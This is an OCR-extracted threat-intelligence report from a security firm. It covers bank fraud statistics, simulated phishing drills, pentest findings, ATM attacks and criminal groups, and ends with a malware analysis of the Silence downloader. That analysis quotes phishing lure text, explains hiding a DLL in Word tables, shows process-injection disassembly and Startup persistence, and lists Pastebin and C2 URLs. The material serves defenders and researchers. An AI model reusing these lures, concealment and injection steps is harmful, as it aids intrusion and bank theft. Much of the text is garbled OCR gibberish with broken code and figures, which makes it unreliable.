employees whose sole purpose is to deceive bank clients and 
Steal their money. In such cases, leaks of personal data and client 
information are of great value for fraudsters. When you know a 
persons name, loan amount and home address, It is much easier 
to convince them you are an employee from their bank's security 
department. 


Types of fraud 


Attackers keep exploiting human credulity. In 2019, 90% of the 
money stolen from bank clients was appropriated using social 
engineering techniques. Compared to 2018, the share increased 
by 10 percentage points. 


At the same time, the share of malware attacks decreased from 
9% to 3%. 


Social engineering channels 


Figures demonstrate that attackers prefer the phone to other 
communication channels. In 90% of all social engineering 
scams of 2019, the adversaries chose to call their victims. 


The share of fraudulent text messages dropped significantly 
from 33% to 5%. Other communication means were used even 
less frequently. 
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Funds withdrawal 


Theft channels 
by transactions quantity 


In the past, fraudulent bank cards and SMS banking were the 
main tools for stealing money. In 2019, the situation changed, 
and mobile app scams took the lead. Such operations 
constituted 50% of the total number. 


Bank cards are in the middle with 30% of the total number of 
transactions. 


At the same time, SMS banking has dramatically lost popularity 
among adversaries and now takes just 12%. For more details 
about these changes, see chapter Attacks on individuals. 
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Theft channels 
by the stolen amount 


When we sort the channels by the amount of 
stolen money, the share of bank cards and 
mobile apps is almost equal — 42% and 43% 
respectively. 


Stolen funds withdrawal 
channels 


The most common channel for withdrawing 
Stolen money in 2019 was via various web 
services (65%). These included various services 
for purchasing goods, services or bonds via the 
Internet. 


Bank cards held the second place among the 
most common withdrawal methods (21%). 
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Geographic spread 
of fraudulent bank cards 
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Most of fraudulent cards are issued in Moscow 
(12%). The second place is shared between 

St. Petersburg, Rostov and Sverdlovsk regions 
(6% each). 
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In 2019, we saw a decrease in the use of malware to steal 
money from ATMs: the share of such cases dropped down 
to 0%. The same happened to Black Box attacks (using a 
specialised hardware device to extract cash out of ATM). 
At the same time, the share of physical break-ins into ATMs 
increased: this method was used in 63% of cases. 
Break-in 
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Corporate 
vulnerabilities 
study 


This part presents the analytical data we gathered while conducting 
penetration testing. Every year, BI.ZONE tests security of dozens of 
companies from different industries, so we have a lot to tell. 


First, we will discuss the statistics on simulated phishing attacks and 
describe standard scenarios used by attackers. We will discuss how 
regular trainings lead to significant increase of employees’ resistance 
to socio-technical attacks. 


The second part of the section describes infrastructure and 
application security inside companies. We will look at the assets 
that are prioritised by businesses and assets that remain poorly 
protected. We will also discuss the most frequently encountered 
dangerous vulnerabilities of 2019 and what a potential attacker can 
achieve by exploiting them. 


In the third part, we will discuss the process-based approach to 
securing a company's external perimeter and the tools that could 
be used to help. We will share our three-year's experience with 
automated vulnerability scanners and give recommendations 
regarding their use. 


Phishing training 


Most frequently, real attackers use phishing to gain access to 
valuable company assets. The attacker pretends to be a trusted 
party, e.g. a mail service or a bank, and tries to obtain either users’ 
confidential data or the means to access it. 


We test our clients resistance to such attacks by conducting 
simulated phishing campaigns. Figures show that such drills 
are helpful in preparing employees for actual attacks, but only if 
performed on a regular basis. 
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We have identified two major scenarios 
involving phishing letters. 
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Malware launch 


The user receives a letter with an attachment. 
In most cases, it is a Microsoft Word 
document that presumably contains important 
information (a contract, a payment order, 

a commercial offer, etc.). This file contains 

a macro, a programme written in Visual 

Basic. Such programmes are normally used 

to automate routine tasks in MS Office 
products, but attackers use this tool for their 
own purposes. They add malicious code ina 
macro, which helps them to gain the necessary 
privileges in the system and proceed with the 
attack. To reach their goal, all they need is 

to make the user launch the macro from the 
attached document. 
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Credential phishing 
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The user receives a message prompting them 
to follow an external link to a website that the 
attackers claim to be legitimate. The website 
can mimic a web version of an e-mail service or 
an internet bank. 


Layout of such a website is identical to that of 
the legitimate website, and its domain name is 
often different to the legitimate one in just one 
symbol. The malicious website asks for users’ 
confidential data (login and password in most 
cases). 
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Examples of phishing scenarios 


Updated procedure for salary 
indexation 


across industries 


Type: malware launch 
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The favourite practice of attackers in such letters is 
using words like ‘salary’ and ‘bonus to attract attention. 
The results of our simulated attacks show that such 
scenarios are the most effective. 
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URGENT: New rules for salary indexation for 2020 
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For security purposes, Microsoft Word prohibits launching 
macros without the user's permission by default. For this reason, 
attackers include pictures that imitate ‘system messages. 
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The ‘message tricks the user into activating the macro to view 
the content (as shown in the screenshot below), without raising 
any suspicions. Hoping to read an important document, the user 
ultimately launches the execution of a malicious code on their PC. 
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Outlook Web App 
password reset 


across industries 


Type: credential phishing Outlook Web App 
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To distribute phishing letters among 
company employees, attackers often use 
the scenario involving the corporate email 
service Microsoft Outlook. 


al ChuRGE AACE 


The password change interface of the 
Outlook web version is the same for most 
organisations. This makes it easy for the 
attackers to create a proper phishing page, 
send it to the target company’s employees 
and obtain their corporate credentials. 
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Your account has been accessed from the IP address 163.172.143.112. 
You should change your OWA password immediately. 


To change your password: 
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1) Click here to proceed to the Change Password page 


2) Enter your account information in the respective fields and then create a new password 
as follows: 


Username: your account name 
Current password: your account password 
New password: create and enter a new password 


Confirm new password: type in your new password again 
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Results of simulated attacks 


To evaluate the results of such trainings, we analysed the data 
gathered during simulated phishing attacks that we had conducted 
for our clients over the past three years. 
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We divided the sample into two groups: 


companies with employees encountering simulated phishing for 


the first time; 2 
companies that have been conducting such trainings for more 5 4 
than two years. a>? 
O i 
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As the figures show, companies that conduct regular training eS 


for their employees can significantly reduce the percentage of 
potentially successful phishing attacks. 
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Despite these optimistically low numbers, companies should keep in mind 
that a single careless employee can open the door to intruders and give them 
the required access to the system. That is why phishing is the most popular 
vector of attack: minimal investments deliver results promptly. 


In view of this, it is vital to introduce a comprehensive approach to help 
employees recognise phishing by its technical aspects. This can be done 
by scanning attachments using antivirus and anti-spam solutions, or by 
checking e-mail addresses in a large list of indicators of compromise, etc. 


In companies that conducted 
phishing drills for the first time: 


every 4° 


employee opened 
an attached document 
and enabled macro; 


every 3° 


employee followed 
a phishing link; 


every 6 


employee entered 
credentials on 
a phishing website. 





In companies that have been conducting 
phishing drills for more than two years: 


every 35% 


employee opened 
an attached document 
and enabled macro; 


every 28 


employee followed 
a phishing link; 


every 70% 


employee entered 
credentials on 
a phishing website. 
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Penetration testing 


Simulation of attacks on the company’s IT infrastructure is 
used to detect technical vulnerabilities. The procedure is called 
penetration testing or pentest. 


In 2019, we conducted 96 projects of this kind. The results of 
our analysis show that the overall level of security in companies 
Still leaves room for improvement. 


Financial sector leaves us with a much better impression than 
the rest since it traditionally pays more attention to security 
than organisations from any other industry. 


Protection level 


After a pentest, the client receives a protection rating. It can be 
high, medium or low. 


The evaluation is based on the severity of detected vulnerabilities, 
their number and a few additional factors. Evaluation criteria and 
their percentage vary depending on a specific organisation. 


In the selection presented below, we divided the tested 
companies into two large groups: financial and others that 
possess an IT infrastructure. 


The types of tests were divided by the types of examined objects: 


web applications; 
external infrastructure; 
internal infrastructure; 
mobile apps. 


Half of the systems we worked with demonstrated a low level 
of protection. 
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Looking only at financial companies, we 54% 59% 


see that the low rating comes up much less 32% 41% 
frequently than in the other industries. At the 
same time, 14% of financial organisations have 
a high degree of security. 








Finance 


across industries 


Banks and payment systems put a lot of 
emphasis on cybersecurity since their IT 
infrastructure opens a path to large sums of 
money. 14% 
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If we analyse how these indicators correlate z ; 
with project types, we will see a similar ® 
picture. It should be noted that the internal oi 
infrastructure remains the most vulnerable Protection level > 
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Attack objectives 


During penetration testing, our experts essentially imitate actions 
of a potential attacker. The simulation is normally based on several 
assumptions about the adversary: what they are after, what they 
Know about the target and what kind of access to the target system 
they may have. The goal of penetration testing is checking if an 
intruder can complete their objectives based on the conditions 
mentioned above. 


In general, we assume that potential attackers aim to gain financial 
or other personal benefits as well as inflict damage to a company or 
its clients. We elaborate these aims in greater detail depending on 
the objects of research and the intruder’s role. 


|. Confidential and personal data theft 


In 2019, clients’ confidential data were obtained in 61% of external 
pentest projects. Personal data was successfully obtained in 38% of 
cases. 


In these projects, we considered a model of the external intruder who 
acts via the Internet and has no additional information about the 
system. As we can see, despite constant discussions about personal 
data protection, many companies disregard this issue, remaining 
easy targets for intruders. 


of external 
pentesting projects resulted 
In access to sensitive customer data 
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2. Source code access 


In external penetration testing projects, 
the services source code was accessed 
in 43% of cases. 


3. Internal network 
access 


Access to the internal network was gained 
in every fourth external penetration testing 
project. Given the often-encountered 

high degree of vulnerability of internal 
infrastructures, intruders can easily go 
deeper and gain control over most of the 
companys IT assets. 


4. Domain 
infrastructure control 


Our experience shows that companies 
still suffer major difficulties with the 
security of the domain infrastructure. 
Most organisations we tested for internal 
penetration turned out to be vulnerable. 
Specialists managed to gain the domain 
administrator rights in 9 cases out of 10. 


The domain administrator rights 

give intruders full control over the 
organisation's IT assets, allowing them 
to gain access to confidential and 
personal data, an organisation's most 
valuable resources. 
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pentesting projects 
resulted in the compromise 
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89% 


of internal 
pentesting projects 
resulted in access 
to domain administrator 
privileges 
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Vulnerabilities rating 


This rating includes vulnerabilities of medium 
and high severity. All test objects are divided 
into three categories: 


web applications and external 
infrastructure™; 

internal infrastructure; 

mobile apps. 


Web applications and 
external infrastructure 


The most frequent problem is the access 
control vulnerability. We detected it in 67% 
of projects. 


Despite the large number of technologies 
allowing to minimise SQL code usage in 
applications, it remains yet impossible to 
completely eliminate SQL injections. They 
were encountered in 24% of cases. 


SSRF and XXE appeared in 13% and 
11% of projects, respectively. It should 
be noted that their severity often did 
not exceed the medium rating since it 
is almost impossible to build an attack 
vector using these vulnerabilities. 


Vulnerabilities associated with file upload 
(16%) and the possibility of unauthorised 
file reading (14%) were also rather 
frequent in 2019. 
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Internal infrastructure 


The attack technique that hackers have been using for over 10 years already — 
the NTLM hashes capture — is being used to this day. It was successfully used 
in 78% of internal penetration testing projects. 


Weak or default passwords helped intruders to advance through the internal 
network in 22% of cases. Whereas insecure critical data storage was exploited 
in 44% of projects. 


The problem of weak and default passwords is much more frequent in the 
internal network than in web applications: 22% vs 6%. 
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Mobile apps 


Insecure data storage is the most frequent vulnerability, it was discovered 
in 67% of projects. 


Cybersecurity maturity 
across industries 


Insecure data transfer issues were encountered in 49% of projects. 





XSS via the Web View component for web page integration with mobile 
apps was successfully exploited in 23% of projects. 


Vulnerabilities common to mobile apps, such as phone numbers 
enumeration and SMS limit abuse, were encountered in 17% and 14% 
of projects, respectively. 


Cybersecurity 
figures 


Insecure Data Storage 


es 6 / 


Disclosure 

5.5% 
Som 

es 29), 


Background 
es 5 / 


Session Issue 
es 25/6 
XSS * Web View 
ZY 
User/Phone Enumeration 
ees | 

SMS Abuse 

mmm 14% 

Path Traversal 

oe 9% 

Exported Issue 


me 8% 


Attacks 
fo) ae of-1 01 .4-) 


Attacks 
folame) cer-lalist-lalelal= 


YN 
(40) 
a) 
<D 
£5 
asc 
= 
e) 


(Or-TaV{ole m-1m-lale| 
Yor-] | alin at- [el <=) ara 





0 100 


yNeyeluns 
3140) NI = 





oO 

> 
a 
x 
ne 
‘ag 


Risk level 





ZONE 


Protection research Te 


Process-based approach 
to vulnerability 
detection 


Continuous penetration 
testing 


When we conduct phishing simulations on a regular basis, 
we see a Significant progress of employees. They recognise 
techniques of attackers more frequently, and thus the 
company's protection level grows. 


However, this approach does not work in the case of 
penetration testing. A single pentest cannot protect from new 
vulnerabilities. It only temporarily increases the protection level, 
without helping to build the process. 
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According to our thee-year statistics, 
companies that conduct annual 

penetration tests have the same number 

of vulnerabilities. This is not because the 
cybersecurity department fails to patch the 
detected vulnerabilities. The fact is that new 
vulnerabilities manage to appear over this time. 


This data showed that other technologies are 
necessary to secure the external perimeter. Our 


decision was to conduct continuous pentesting. 


The industry shows the same trend for the 
process-based approach all over the world. The 
idea is to establish a continuous process of 
vulnerability detection. 


As part of this approach, we have developed 
a special online platform which combines the 
experience of our experts and the power of 
automation. 


Protection research TS 


Thus, appeared the Continuous Penetration 
Testing service, or CPT. It allows to continuously 
track modifications on the IT perimeter, to 
detect new assets and to conduct single 
penetration testing. 


This approach allows to monitor the level of 
security of the external perimeter and to reduce 
the vulnerabilities’ lifetime. 
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Vulnerability 
scanner is no 
Cure-all 


Cybersecurity maturity 
across industries 


Automated scanners are extremely 
popular, but they are not always effective 
at searching for vulnerabilities. 


We analysed the results of automatic 
scans conducted in different companies. 
It turned out that we encountered only 
600 unique vulnerabilities out of a total 
86,000 included in the scanner database. 
One of the most popular scanners is able 
to detect less than 1% of the number 
claimed by its manufacturers. 
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We do not suggest abandoning 
automated tools, we use them ourselves 
and are really fond of them. But it is vital 

to understand that a scanner is no cure-all, 
and most of its plugins are likely outdated, 
while the most critical vulnerabilities can A plugin is an algorithm 


usually be detected only manually. ie ea 


Based on our experience, we recommend presence of a particular 
lete| | d vulnerability. Each plugin 

not to complete Ms retry on SCanners an corresponds to one 

always check their results manually. unique vulnerability. 
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For the past 18 months, cybercriminals 
alt= \om Ol=1~1a cle lUl t= la\vacsiaallarelalem ey-lal.es 
that they are vulnerable even in the areas 
where they feel relatively safe. We are i 
talking about ATMs. In the previous Ys 
Threat Zone, we posted rather optimistic 
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that can be drawn from the said figures 

are still valid. However, new Information 
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to this part of the banking infrastructure. 
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As for other threats, the attackers did | | | ie ain : 
not surprise us with fundamentally new . 7 i 
vectors, targets, and tools, save for the Tagt i ae r 
that they have updated their malware. At | ae 

the same time, several groups who had 
earlier went off the radars have now re- 
entered the scope of the cybersecurity 
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Last year, we noted that attackers lost their 
e)ganlcimlalicicoci maw AU M\Vicmmnalcmalelanieloime)i 
attacks on these machines is decreasing 

with each year, at least when it comes 

to malware attacks. According to the European 
Association for Secure Transactions (EAST), 

in January — June 2019, 35 cyberattacks 

on ATMs were reported in that part of the 
world, and this is a 43% drop from the same 
period of 2018. Malicious software was only 
used in three cases. Otherwise the attackers 
used the good old BlackBox, leading to just one 
successful attack when the adversary stole 
less than €1,000.' 
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Source: European Association for Secure Transactions (EAST) 


At the same time, EAST reports an increase 

in physical attacks on ATMs. The number of 
break-ins for the first six months of the previous 
year went up 16% to nearly 2.4 thousand. 
However, losses from these types of attacks 
have decreased by a quarter (€11.4 million). 


mNY20)a(e mpalciealolersmante\vaacelmlaa]®)\atalomaaleysie 
sophisticated exploitation of the hardware and 
software vulnerabilities, but an exploitation 
nonetheless. This cannot be disregarded. 
Apart from that, there is a small percentage 

fo) el alanliate]me]cele] Om ialon al \icusielaaler(ciale 
resources to organise advanced campaigns. 
In 2019, we observed two of them. 
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The number of TRF attacks on European ATMs in the first six 
months of years 2015-2019 


Source: EAST 


TRE: malfunction 
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The rates of ATM attacks are increasing as 
well as the amounts stolen in these attacks. 

In January — June 2019, EAST recorded 10.7 
idaloletsy~]alemclelolalalelel=1alecwmlarclmcmolor/maslelcomnalcia 
for the same period of the year before. Losses 
for the first half of 2019 reached €124 million, a 
16% increase from the previous year. 
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involve the transaction reversal fraud TRF — 
that makes up 53% of all ATM attacks.? 
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software, but rather exploits the existing flaws 
of the ATMs themselves. In a TRF attack 
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initiated cash withdrawal. During the process, 
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operation which fools the ATM into dispensing 
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to the bank that the transaction had been 
reversed. One way this can be done is if the 

ial aaliarsimce)celle)\yme)(ele) <omialow UNV mice laamacitelaaliare 
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The EAST survey covers primarily Western 
Europe. In advanced economies, financial 
institutions pay a lot of attention to 
cybersecurity. This is exactly the reason why 
the number of malware attacks on ATMs has 
been so insignificant: the methods are too 
complicated and require physical presence, 
while the value of the stolen assets is not so 
high as in the cases with ATM theft or breaches 
of other parts of the banking infrastructure. 
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High-tech theft through ATMs is only possible 
for large and well-organised criminal groups. 


In October 2019, U.S. Department of Justice 
reported the arrest of 18 members of one of the 
largest cybercrime groups, who for five years 
had been engaged in a high-tech skimming 
operation across 18 states. The amount stolen 
exceeded $20 million. 


iil a\-mDlOlemellemarelme(-\e1g| e\-mlane|-ir-llmialouseial~iaalc 
of the fraud, but the names, surnames, 
nationality of the suspects, as well as the 
circumstances of the case itself suggest 

that the defendants are associated with the 
NAK=p-dTere]a exe) an] ey-la\alaitelerslsiama malisme)gel-lalisy-lle)e 
has been a front for large frauds with the 

use of ATMs since 2015.° The suspects 

used Bluetooth-based skimmers installed on 
(oxe)an]ele)alqialesmexe)alalcveic=rem (el mer-| fem t=r-le(-1aro] ale 
PIN pad. The attackers chose terminals located 
in the most popular tourist spots in Mexico and 
bribed ATM service specialists to install the 
Syelsrele marc Ine hWiclice 


In the late March 2019, Mexican police arrested 
two people suspected of running Intacash.° 

It was reported that the detainees had been 
under FBI investigation.’ 
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5. Who's behind Bluetooth skimming in Mexico? // Krebs on 
Secuninys 

6. Two Romanian men arrested with cash, gun at Puerto 
Morelos // Riviera Maya News. 
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in Mexico // Krebs on Security. 
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Lazarus: HR fraud 


When it comes to ATMs and malware Lazarus, 
one of the most advanced cybercrime groups 
presumably supported by DPRK government, 
is sure to pop up. Over the past year, we have 
heard about two incidents of attacks on ATMs 
attributed to the group. 


In December 2018, Redbanc, which 

essentially controls all of the ATMs in Chile, 
was compromised using social engineering. 
The attack vector passed through LinkedIn, 

a social network for business contacts and 

job search. The attackers posted a vacancy 

ad for a developer on the website, and a 
Redbanc employee responded to it. Soon, the 
attackers contacted him and even conducted 
an interview on Skype. Then they asked the 
employee to download and run ApplicationPDF, 
a programme that was supposed to generate 
a job application form. In reality, the executable 
Tile was malicious but managed to bypass the 
antivirus protection.® ? 


Samples of the ApplicationPDF.exe file, which 
were available publicly turned out to be 
downloaders of PowerRatankba, Lazarus own 
malware. It collects and sends to attackers the 
basic information about the infected system: 
username, technical specifications and other 
Talie)aaatclile)a-lelelelmtat-m@lowme) ce) avac\-1itlale|syra] ale 
a list of running processes. PowerRatankba 
also checks to see if the ports are open 

for connection via the RPC, SMB, and RDP 
o)ge)(eyexe) som lint alomaarel Niel tom aalclarclel-rcmconel-lia 
system administrator privileges, it downloads 
a Powershell script for the next stage 
(Powershell is a software engine and scripting 
Flalelerclelomre)mn'Aulare(ennicmelelaalialiciercla(e)a) ae 
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en diciembre [EXCLUSIVE. Redbanc suffered an 
lakelanlelccte Me\'de\~larolata\el @iamDl-\el-1anle\-1d w/a ld-lalen LOR 

9. North Korean hackers infiltrate Chile’s ATM network after 
Skype job interview // ZDNet. 

10. Disclosure of Chilean Redbanc intrusion leads to Lazarus 


ties // Flashpoint. 


The earliest attacks of the group 
named Lazarus (also known as 
Hidden Cobra) were reported in 
VAG) OV Ar-\alemelelaialemearcmslaciaiielall 
years they had exclusively a 
political motive, as they were 

oli c=Xoit=romr-ler-llalsimtai-mere)-lealanlcialt 
and organisations of South Korea. 





Sy[alexsw7 OM komma alsuclutclel<slesmarslic 
switched to financially motivated 
attacks. One of the most high- 
profile campaigns of this kind was 
idatcmarclel.<ialeme)isalcmsr<lale|(clel=s<ia) 
Central Bank in 2016. Lazarus 

rel atclanlelccromcom\\iiealelechwarclerelelt 
$850 million through the SWIFT 
system, but a mere $81 million 
was Stolen due to a\spelling error. 


Lazarus attacks are technically 
sophisticated and precisely 
if-]ge[-1ccromm fameal=imarclel<ale 
Campaigns, the group uses 
RESMON Yam aatel\clacraialelanrsls 

a rule, is tailored for the target 
infrastructure. 
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Silence: beyond Europe 


Another group that specializes in complex attacks on ATM networks 
is Silence. Among other things, the adversary excels in social 
ale] |atexoisl elem aaicidaleleisy 


In 2019, the group who previously had only attacked banks in Russia 
and Europe, expanded its presence. In the spring, Silence stole 
money from Sri Lankan Dutch-Bangla Bank ATMs. First, Silence 
attacked the Dutch-Bangla ATMs in Cyprus, Russia and Ukraine, 
and in the late days of May they managed to withdraw funds from 
Sri Lanka itself. The damage from the attack amounted to over $3 
million.'* ' 


Later it became known that at about the same time the group 
attacked banks in India, Kyrgyzstan, Chile, Bulgaria and Ghana."° 
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14. Three banks hit by cyberattacks // Daily Star. 
15. Bangladesh cyber heist 2.0: Silence APT goes global // Group-IB. 
16. Silence 2.0: going global // Group-IB. 
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The past year has been marked by major 
updates to some well-known but forgotten 
aareliclace 
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figures 
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ai a\smUlesjalim ey-10],<1alemece)(-]a Mir Ise (o\\<1(0) 01-10 0-101, 
in 2000. Six years later, experts discovered 
Gozi, another trojan that is partially based on 

Cl esialinm Dlblcmonsy|aalitclaieicrsmlamivlacelie)alsw-lalemerele(cs 
el alelWASIESHOIcISSIAVAUAI=M ANON 18010] f-]00]8alose-lsme)a\ord 


Attacks 
on banks 


In 2019, Ursnif operators were consistently 
Haalidiarefudalsiiqer-lae]ey-|le|atsmcoms)el-(ellllemexe)e] alts i<rcy 
In January and February of that year, Japanese 
banks received lots of Ursnif samples collecting 
not only banking, but also personal data of 
customers. These samples terminated if the 
SWVASi(olaa le] alelUlclelome)m-lamlalicveltcremaarcleialialcm\\r-ls 
not Japanese.'® '? In March, similar campaigns 
were reported in Italy, but this time the 
attackers did not limit their targets to banks 
and the sample's operation was not tied to the 
language settings.”° 
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stolen using 
GozNym, a hybrid 
malware?! 


(Or-Tamyelem-i1-lale 
against a hacker? 


see Cloy4i(aatel\telaomrelanyl Malpedia (Fraunhofer EKIE). 


18. New Ursnif variant targets Japan packed with new 
features // Cybereason. 


s Kea Ulacialimey-1al,lalemage)t=lams-1ar-lalmcitcrolismanle)aomiatclamilarclaleltel 21. GozNym malware: cybercriminal network 
data // BankInfoSecurity. dismantled in international operation // 


20. The Ursnif gangs keep threatening Italy // Yoroi Blog. Europol. 
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M Explosion 
M BlackBox 


Malware 


TaWa\ 0)4|NVAGMLeym@ny1 0\~1 6s\-1010]818VA=).401<1 MISO |I\OLO N21 1-16) 
GozNym, a hybrid of Gozi and Nymaim. The 
latter is a rather aggressive dropper, it delivers 
=] alee] e)(erclelsw- (ele llelarclmantcl\ ic lk-mcomtalcmlalicveiccre 
nate lerallal=eun in al=me] ce) 0) 0\-]mUlsy-tomaalelide)(smccveralallelelors 
to maintain its foothold on the system, as well 
as to bypass cybersecurity solutions. Nymaim 
ISMelAWZe VASO] Sitale]Ulccrom| allele |iN(e/amcon-laleliai=is 
malware. 


Nymaim is believed to be a small closed 

group that keeps source code from leaking. 
Hence, it is possible that any hybrids based 

on this malware is developed by the group 
itself. GozNym in this case is most likely not an 
exception, especially given the fact than Gozi 
source code was leaked twice before (in 2010 
and 2015).74 


In May 2019 Europol announced the arrest 

of GozNym operators. The group that spread 
across five countries, was lucky to steal about 
$100 million from 41 thousand victims, mainly 
companies and their authorised banks.?° 


computers were infected by 
GozNym, most of them are 

oNVsVal=1e ©)’ ©) dhvs-1h= exe) gal ey-lal (== 
re] alomWal=)lar-leiWale)disi=1e mi ey-] a] .¢omee 


22. Meet Goznym: the banking malware offspring of Gozi 
ISFB and Nymaim // Security Intelligence. 

23. GozNym malware: cybercriminal network dismantled in 
alccidatetalolarelme)eloi¢olilelaWsmntelcelele)e 
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Retefe: legitimate 
cover and quiet 


Oroxy 


atom ey-la).<lale Mice) (-l@MaXcliciicmiclomilesime(=s\eig]e)<10 

[a ACh Fomm-Nicx-le\mtalcianiclarel\Vclesmarelilecremuarele 
Retefe was used in just three countries: Sweden, 
Switzerland and Japan. Another specific 
feature of Retefe was its operation mechanism. 
Typically, such malware steal credentials from 
the victim's web browser. But Retefe creates 
forged certificate to deploy a full-fledged man- 
in-the-middle attack and to redirect the victim's 
traffic to a banking web site via a proxy server 
controlled by the attackers. 


In 2018, Retefe was not particularly active, but 
in 2019, this malware asserted itself in a loud 
el alemer(crlmaalclalalciem am salou a\c\\ mee eale)iarclulelameal= 
trojan retained Its specific features: limited 
geography (compared to 2015, it became 
purely European: Sweden, Switzerland, Austria, 
Great Britain) and traffic proxying. At the same 
time, innovations emerged. 


Firstly, some Retefe samples began operating 
disguised as an installer of a harmless 
programme. A Python script is packed in the 
primary executable file, which goes on to 
create two other executable files in the victim's 
storage. One of them is a legitimate installer 
of the trial version of the Convert PDF to Word 
Plus application, the other one runs in parallel 
and is a Retefe downloader running at the same 
time. In some particular attacks committed 

on MacOS computers, the downloader was 
distributed as Adobe software installer. 


24. Retefe banking trojan targets Sweden, Switzerland and 
Japan // Unit42 (Palo Alto Networks). 
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the risk of traffic interception by a third party rt " 
(in the TOR packets go through several Y 
ad systems were infected with machines before reaching their destination). 
| dalam aVViVacll (slalerame lolli al lefelelat Furthermore, a connection to TOR ina 
: ae k corporate network looks more suspicious than 2 
PAG SUL Usd ashes the standard SSL protocol used by ‘stunnel..*° : 4 
a 
© i 
me) 
> 
O 


Silence: the new 
a ofe\vvialrersler=i4 


The aforementioned Silence group has not 
only expanded the geography of their attacks, 
but also improved one of their tools, the 
efoywiallere\el=1 
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In February of this year, we spotted the Silence 
email campaigns targeted at banking clients. 
ii alcmer-lanley=)(e|alsmale\icmtalcmie)|(@\Wilalemtalacte 
features. 


The malicious DLL was displayed in the form 
of Microsoft Word tables. 


Attacks 
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To download additional code, the attackers 
used pictures and texts stored on Imgur and 
Pastebin, both public hosting services. 
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a part of another malware was used, Parallax, v2 
which is sold on darknet forums. a 2 
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Silence 
downloader 
analysis 


Downloading and 
execution of the 
downloader 


The Silence downloader's route to a system 
consists of three stages. In the first stage 

a user receives an email with an attachment. 
The attached document contains a macro 
responsible for receiving the malicious DLL file. 
Finally, the DLL allows the attacker to download 
and run the executable file. 


Stage 1. A message with 
malicious attachments 


The attackers distribute malware via email 
signed by a Vika. The message itself with 

a subject line ‘Tramp novosti posmatri’ (roughly 
translated as ‘Trump news check it out’) offers 
footage of secret negotiations. In reality, the 
email contains a malicious DOC file with a 
macro. 


Stage 2. DOC Tile with 
macros 


A DLL is hidden in the body of the malicious 
document. The DLL contents are displayed 
in the form of tables embedded into the 
document. 


A macro is used to retrieve a DLL file from 
thetables. It converts each table cell into 
4 bytes of the future DLL: the cell text is 
processed as an integer value. 


Protection research 
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For example: 


- 9460301 Is converted into 4d 5a 90 O00; 
- 3 is converted into 03 00 00 00; 
- 4\s converted into 04 00 00 O00. 


The malicious document contains both 64-bit 
and 32-bit versions of the library. The contents 
of the 64-bit library are located between the 
keywords ‘SeasonValue’ and AppendCell, 
contents of the 32-bit library are between 


‘Visions and ‘FindWords’. The bitness of the 


loaded library is selected in accordance with 
the bitness of the process. 


Stage 43. DLL 


When the library is received, the macro copies 
it to the directory under the name of 
and loads it. Next, the macro 
calls the function from fReieR eye 


and after that a new version of the Silence 





downloader is delivered to the infected machine. 


In the recent campaign, the contents of the 
malware were downloaded from Pastebin, 
a service for hosting text files: 
pastebin|.]com/raw/Jyujxy/ziSfelela 
after the campaign this file appeared to be 
unavailable. 
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Getting the 
unpacked 
downloader 


The downloader writes its code twice to the 
address space of the process. 


First injection: how this goes 


During this injection, Silence uses a tool for 
remote access to the infected system. This 
component is taken from the downloader of 
Parallax, a malware sold on darknet forums. 


The malware creates the child 
process in a suspended state. Next, the 
malware overwrites the entry point of the 
created process. 


Code used for overwriting 
the entry point of the cmd.exe process 


=} a} 9) 

=] 0) oN =I 8) 
esp, 148h 
eax, eax 


[ebp+var_10], ax 


loc_8001F : 
pan 01 0) D) simp, 50 od IPA] OME 14] 6 Aho) ObR| 


; sub_ 80010: loc_80621.j 


cx, [ebp+var_10] 


cx, 1 


[ebp+var_10], cx 


eax 
(=F: ) Qn 21015 10]51015101 518) 
[ebp+var_1006], eax 
eax 

edx, [ebpt+var_100] 
[ebp+var_4], edx 
1388h 


eax, [ebpt+var_4] 
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ecx, [eax+24h] 


ecx 
sub_81240@ 
esp, 8 


The malware also writes the decrypted code and 
data to the allocated memory area. 


Before resuming the process, the 
constant (see code above) is 
replaced with the address of the allocated 
memory area wherein the malware code and 
data were written. 


First injection: the result 


The malicious code that starts as a result of 
the first injection is quite similar to the code 
of FRISBEE PBT The imported functions are 
obtained via CRC32 values from their names. 


As a result of the execution of the malicious 
code execution, the malware downloads 
the image from 

and saves it as 


%TEMP%/<random-hex-string>.png} 








The code fragment that downloads the 
image is also similar to the code fragment of 
that downloads the executable 
file. This shows that the attackers reuse 

the code at certain stages of the malware's 
operation. 
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Second injection 


The content of the downloaded image is used 
to obtain the executable file of the Silence 
downloader, as well as the code and data that 
execute it in the address space of the 
child process (not to be confused with the 
process having the same name, which is used 
during the first injection). 


The obtained code registers the file 


downloaded from [ghedekswdder-konaslen al me kete)i02 
a UR Aeepeee4 (tO autorun. It goes as follows: 


during the execution of the received code, 
the executable file is copied to the disk in 
an arbitrary folder located in the 
directory, with the name Weferw ERS Ze 


a shortcut named Eggevarelo)iitet ald Ge 








Gidetalees (0k is created in RRR directory, 
which is then copied as WKefer-a Mal to 


~UserProfile%\AppData\Roaming\ 


Microsoft\Windows\Start Menu\ 


Programs\Startup. 


After that, the malicious code executes 
Silence downloader in the address space of 
the child process, which is used 
during the second injection. 





Communication 
of the downloader 
with the C2 server 


The main cycle of communication with the C2 
server is shown below. 


Main cycle of communication with the 
control server 


__thiscall Main_sub_401168(main 


(of oman 6 [=i tr ME. 101 OM 0 f- ht; EU Av a=] OD 4 
handler_data *handler_data; // edi 


*x_handler_obj; // esi 
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OZ 


handler_obj; // al 


cc_data = &this->cc_data; 


handler_data = &this->handler_data:; 


_handler_obj = 
Y=] ale] DF-h ors Wel @107-Valeler-nme@xe)iiiiit-lale Mm 
sub_402E72(cc_data) ; 


CommandHandler_sub_402C31 (handler_ 


(oF-hier- a aY-V ae BK -¥ to) oy 
( _handler_obj ) 
(**_handler_obj)(_handler_obj, 1); 
Sleep_sub_401BD1 ( 1: 


handler_obj = CheckBreak_ 
sub_402A11(handler_data) ; 


( handler_obj ) ; 
handler_obj ; 


Communication between the downloader and 
the C2 server goes as follows: 


the downloader sends request to: Weqelts aa 
Tikdal cede-lelelkneleya and receives an |D 


number assigned to the infected system; 


all subsequent requests are made to 
hxxp(s)://minkolado[.]top/{num} 


the C2 server's responses with a command 
for the downloader. 


Commands from the C2 server are processed 


iN the elitnkeyavelatclatew asta (UNCON. 


CommandHandler function pseudocode 


code_1 = GetCode_sub_4028E8(handler_obj ) 


( !code_1 ) // if command_code == 


NewIdentityCommand_ 
sub_402989(handler_data, handler_ 
obj);// new_identity_command 


code_2 = code_1 - 1; 


( !code_2 ) // if command_code == 


>; // nop_command 


code_3 = code_2 - 1; 
